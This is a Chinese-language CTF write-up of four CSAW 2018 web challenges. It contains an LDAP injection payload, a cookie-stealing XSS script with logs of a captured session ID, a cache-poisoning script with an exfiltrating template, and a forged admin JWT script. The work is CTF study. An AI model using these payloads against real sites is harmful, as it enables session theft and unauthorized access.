[CSAW CTF'18] web writeup

Ldab

後來才明白原來題目名就已經是hint了， 進去之後就會發現輸入括號和沒有括號是有差別的， 然後想起來最近的noxCTF剛剛做過一個LDAP注入

之前那道題的payload是*)(|(descripton=*就可以了 學習網址 https://www.jianshu.com/p/d94673be9ed0 就是先尋找他的objectclass 總共9個一個一個測試

• commonName
• description
• seeAlso
• l
• o
• ou
• documentTitle
• documentVersion
• documentAuthor
• documentLocation
• documentPublisher

按之前怎麼試怎麼不行後來多了一個括號突然就可以啦。

這道題需要多一個括號就好了 *))(|(ou=* 猜測他是有三個括號來結尾

No Vulnerable Services

這道題是考驗auth認證的過程吧=。= 我還以爲跟之前的tjctf做的差不多，太菜了太菜了 這道題居然有CSP！！！我終於看到xss題目了

Content-Security-Policy: default-src 'none'; script-src *.no.vulnerable.services https://www.google.com/ https://www.gstatic.com/; style-src *.no.vulnerable.services https://fonts.googleapis.com/ 'unsafe-inline'; img-src *.no.vulnerable.services; font-src *.no.vulnerable.services https://fonts.gstatic.com/; frame-src https://www.google.com/

default-src 'none'

然後後面的說明所有的語句都只能在*.no.vulnerable.services 被加載進去 明顯可以發現有一個可以提交到後臺的地方，如果代碼有問題會顯示

這裏可以xss 在文章的最下面有

d8a50228.ip.no.vulnerable.services

d8a50228是目標ip的16進制

可以用這個來繞過csp

構造payload

var img = document.createElement("img");
img.src = "http://784eb86f.ip.no.vulnerable.services/?cookie=" + encodeURI(document.cookie);
document.body.appendChild(img);

成功訪問了我的xss.js

216.165.2.40 - - [17/Sep/2018:20:33:46 +0800] "GET /xss.js HTTP/1.1" 200 0 "http://admin.no.vulnerable.services/review.php?id=2421" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/69.0.3497.81 HeadlessChrome/69.0.3497.81 Safari/537.36"

可是腳本沒有加載進去。 換了服務器就可以了

17/Sep/2018:21:16:13 +0800] "GET /xss.js HTTP/1.1" 200 504 "http://admin.no.vulnerable.services/review.php?id=2423" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/69.0.3497.81 HeadlessChrome/69.0.3497.81 Safari/537.36"
216.165.2.40 - - [17/Sep/2018:21:16:13 +0800] "GET /?cookie=PHPSESSID=khodgtpntqt58611ai47nf20vk HTTP/1.1" 200 328 "http://admin.no.vulnerable.services/review.php?id=2423" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/69.0.3497.81 HeadlessChrome/69.0.3497.81 Safari/537.36"

http://admin.no.vulnerable.services/login.php

訪問lb.php可以看到

有一個216.165.2.41開着，但是進不去 猜測是要開個support的代理纔可以 support.no.vulnerable.services直接訪問是不行的 ping 一下 support.no.vulnerable.services

172.16.2.5

所以可以使用ac100205.ip.no.vulnerable.services作爲代理來進入216.165.2.41

這樣就好了然後就可以進入216.165.2.41

發現可以ping

命令注入了 就可以直接cat flag

nice

Hacker Movie Club

其實可能是因爲我卡的原因。我的第一個想法是繞過谷歌驗證 然後在下面發現了一個cdn.js

for (let t of document.head.children) {
    if (t.tagName !== 'SCRIPT')
        continue;
    let { cdn, src } = t.dataset;
    if (cdn === undefined || src === undefined)
        continue;
    fetch(`//${cdn}/cdn/${src}`,{
        headers: {
            'X-Forwarded-Host':cdn
        }}
    ).then(r=>r.blob()).then(b=> {
        let u = URL.createObjectURL(b);
        let s = document.createElement('script');
        s.src = u;
        document.head.appendChild(s);
    });
}

可以通過這個讀到mustache.min.js和app.js的源代碼 mustache.min.js 有點長。 app.js

var token = null;

Promise.all([
    fetch('/api/movies').then(r=>r.json()),
    fetch(`//294dc176089c1c625bb201a21887f828c043e545.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()),
    new Promise((resolve) => {
        if (window.loaded_recapcha === true)
            return resolve();
        window.loaded_recapcha = resolve;
    }),
    new Promise((resolve) => {
        if (window.loaded_mustache === true)
            return resolve();
        window.loaded_mustache = resolve;
    })
]).then(([user, view])=>{
    document.getElementById('content').innerHTML = Mustache.render(view,user);

    grecaptcha.render(document.getElementById("captcha"), {
        sitekey: '6Lc8ymwUAAAAAM7eBFxU1EBMjzrfC5By7HUYUud5',
        theme: 'dark',
        callback: t=> {
            token = t;
            document.getElementById('report').disabled = false;
        }
    });
    let hidden = true;
    document.getElementById('report').onclick = () => {
        if (hidden) {
          document.getElementById("captcha").parentElement.style.display='block';
          document.getElementById('report').disabled = true;
          hidden = false;
          return;
        }
        fetch('/api/report',{
            method: 'POST',
            body: JSON.stringify({token:token})
        }).then(r=>r.json()).then(j=>{
            if (j.success) {
                // The admin is on her way to check the page
                alert("Neo... nobody has ever done this before.");
                alert("That's why it's going to work.");
            } else {
                alert("Dodge this.");
            }
        });
    }
});

還有一個main.mst

<div class="header">
Hacker Movie Club
</div>

{{#admin}}
<div class="header admin">
Welcome to the desert of the real.
</div>
{{/admin}}

<table class="movies">
<thead>
 <th>Name</th><th>Year</th><th>Length</th>
</thead>
<tbody>
{{#movies}}
  {{^admin_only}}
    <tr>
      <td>{{ name }}</td>
      <td>{{ year }}</td>
      <td>{{ length }}</td>
    </tr>
  {{/admin_only}}
{{/movies}}
</tbody>
</table>

<div class="captcha">
  <div id="captcha"></div>
</div>
<button id="report" type="submit" class="report"></button>

這個是一開始的佈局 wp的意思這道題需要用緩存投毒來做 js緩存投毒我還是第一次碰到 學習

import requests

X_Forwarded_Host = '1.1.1.1' 

while True:
    resp = requests.get("http://294dc176089c1c625bb201a21887f828c043e545.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host})
    print resp.headers
    if X_Forwarded_Host in resp.text:
        print resp.text
        break

成功緩存投毒 試一下 把X_Forwarded_Host換成自己的服務器之後跑了一會腳本就可以看到他請求了我的服務器已經成功投毒

所以我在自己的服務器下創建一個cdn的目錄和main.mst的文件，讓他訪問一個假的模板

<div class="header">
Hacker Movie Club
</div>

<div class="header admin">
Welcome to the desert of the real.
</div>

<table class="movies">
<thead>
 <th>Name</th><th>Year</th><th>Length</th>
</thead>
<tbody>
{{#movies}}
    <tr>
      <td>{{ name }}</td>
      <td>{{ year }}</td>
      <td>{{ length }}</td>
    </tr>
{{/movies}}
</tbody>
</table>

<div class="captcha">
  <div id="captcha"></div>
</div>
<button id="report" type="submit" class="report"></button>
<img src=x onerror="fetch('http://www.ckj123.com/'+'{{#movies}}{{ name }}{{/movies}}')">

成功了呀。可是投不進去爲啥

看網絡應該是成功了,304緩存成功了，爲啥一直loading。

SSO

這道題是用來了解auth2.0協議的過程的。我覺得 看到過烏雲上的oauth認證繞過

一步一步來

import requests
import jwt

#Authorization Request
code = requests.post("http://web.chal.csaw.io:9000/oauth2/authorize", headers={"Content-Type": "application/json"}, json={"response_type":"code","redirect_uri":"http://web.chal.csaw.io:9000/protected"}, allow_redirects=False).text

code = code.split("protected?code=")[1].split("&")[0]

#Access Token Request
r = requests.post("http://web.chal.csaw.io:9000/oauth2/token", json={"grant_type":"authorization_code","code": code,"redirect_uri":"http://web.chal.csaw.io:9000/protected"}).text

token = r.split('"')[7]

#Modifing Token as admin
res= jwt.decode(token, 'ufoundme!', algorithms=['HS256'])

token = jwt.encode({'type': 'admin', 'secret': 'ufoundme!', 'iat': res['iat'], 'exp': res['exp']}, 'ufoundme!', algorithm='HS256')

#Final Request
req = requests.get("http://web.chal.csaw.io:9000/protected", headers={"Authorization": "Bearer " + token}).text
print(req)

感言

這次的比賽還是非常好的。讓我學到了新知識 緩存投毒和oauth認證的問題 感謝。

參考資料

https://www.anquanke.com/post/id/156356 https://bugs.shuimugan.com/bug/view?bug_no=207504 https://segmentfault.com/a/1190000013467122